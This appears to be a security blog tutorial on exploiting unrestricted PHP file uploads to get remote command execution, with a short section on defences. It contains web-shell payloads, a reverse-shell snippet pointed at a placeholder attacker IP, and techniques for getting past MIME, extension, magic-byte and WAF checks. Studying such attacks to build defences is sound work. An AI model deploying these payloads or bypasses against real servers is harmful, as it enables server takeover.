Unrestricted File Upload to Remote Command Execution (RCE) Attack
In web applications, an "Unrestricted File Upload" vulnerability allows attackers to upload unsafe files and execute commands on the server. This vulnerability usually arises from insufficient validation of file uploads. Attackers can exploit this to achieve Remote Command Execution (RCE) on the system.
1. How to Detect File Upload Vulnerability?
In web applications, users may use functions to upload profile pictures, documents, or files. If the file type, extension, or content is not sufficiently checked, attackers can upload executable files.
Example PHP Malicious File:
<?php
echo "System Info: ";
echo shell_exec('whoami');
?>
In this example, we are executing the whoami command to retrieve system user information.
2. Stages of the Attack
Let’s examine the steps an attacker might take to exploit this vulnerability:
Step 1: File Upload
The attacker uploads a file with a .php extension, sending malicious code to the server. The uploaded file should be directly accessible via the browser (e.g., http://example.com/uploads/malicious.php).
Step 2: Command Execution
Once the uploaded file is executed, the attacker can run any command on the server. For example:
whoami
uname -a
ls -la /etc/
These commands can be used to gather system information and user privileges.
3. Reverse Shell for Full Access
After compromising the server, the attacker can open a reverse shell to gain full access. The following PHP code establishes a reverse connection to the attacker’s system:
<?php
$sock = fsockopen("Attacker_IP_address", Attacker_Port);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
4. Protection Methods
Various methods can be applied to protect web applications from such attacks:
File Type and Extension Check
Only specific file types (e.g., images, PDFs) should be allowed for upload. Additionally, file extensions should be restricted to safe extensions only.
MIME Type Validation
The MIME type of the uploaded file should be checked. However, attackers might bypass this check, so additional validations are necessary.
Randomizing File Names
Uploaded files should have randomized names to prevent attackers from guessing and executing the files.
Limiting Access to Uploaded Files
Uploaded files should be stored in a directory away from the server's root and direct access to these files should be restricted.
Using Web Application Firewall (WAF)
A WAF can detect and block malicious file uploads. By writing appropriate rules, an additional security layer can be created to handle uploaded files.
Bypassing File Upload Protection Mechanisms
Many web applications implement various security measures against file uploads. However, these measures can be bypassed by attackers. Below are some methods to bypass common protection mechanisms:
1. MIME Type Manipulation
If the MIME type of the uploaded file is checked, it can be manipulated. You can modify the HTTP request using Burp Suite as follows:
Content-Type: image/jpeg
However, malicious PHP code can be included in the content:
<?php system($_GET['cmd']); ?>
2. Double Extension Usage
In systems with weak file extension checks, the file name can be altered to something like malicious.php.jpg. The server might execute this file as PHP.
3. Magic Bytes Manipulation
If the application uses "magic bytes" to check file content, malicious code can be hidden with magic bytes:
\xFF\xD8\xFF\xE0 // JPEG magic bytes
<?php system($_GET["cmd"]); ?>
4. Bypassing with PHP Wrappers
PHP's php://input and data:// wrappers can be used to execute code without uploading a file:
<?php include 'data://text/plain;base64,' . base64_encode('<?php system($_GET["cmd"]); ?>'); ?>
5. Bypassing WAF and Other Security Filters
Web Application Firewall (WAF) and other security filters can detect and block attacks. In such cases, the following methods can be used to bypass:
Character Insertion/Removal
You can bypass WAF by breaking up commands:
sy\ste\m('ls');
Base64 Encoding
You can hide commands from WAF by encoding them in Base64:
<?php system(base64_decode('bHMgLWxh')); ?>
This command decodes and executes the Base64 encoded ls -la command.
Conclusion
The Unrestricted File Upload vulnerability can be exploited to achieve Remote Command Execution (RCE). Protection mechanisms are not always sufficient and can be bypassed with the right techniques. Developers should tighten file type and content checks, prevent file execution, and utilize additional security layers such as WAF.
Protection mechanisms may not always be adequate. Attackers can bypass these protections using various methods. Application developers should implement stringent security measures for upload processes, validate file types and content, and use additional security layers like WAF.
Comments
Post a Comment